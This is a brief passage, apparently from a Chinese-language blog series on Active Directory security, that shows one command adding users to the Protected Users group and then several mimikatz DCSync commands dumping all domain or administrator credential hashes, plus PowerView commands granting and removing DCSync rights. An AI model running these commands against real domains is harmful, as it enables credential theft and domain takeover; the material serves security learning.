「打給賀,挖西飛飛,今天你要來點 Active Directory Security 嗎?」
持續認識幾個與 User 相關的安全性群組:
Add-ADGroupMember –Identity 'Protected Users' –Members [使用者名稱]
mimikatz.exe "lsadump::dcsync /domain:fei.tw /all /csv" exit
mimikatz.exe "lsadump::dcsync /domain:fei.com /user:administrator /csv" exit
Add-DomainObjectAcl -TargetIdentity "DC=fei,DC=tw" -PrincipalIdentity fei1 -Rights DCSync -Verbose
Remove-DomainObjectAcl -TargetIdentity "DC=fei,DC=tw" -PrincipalIdentity fei1 -Rights DCSync -Verbose
mimikatz.exe privilege::debug "lsadump::dcsync /domain:fei.tw /all /csv" exit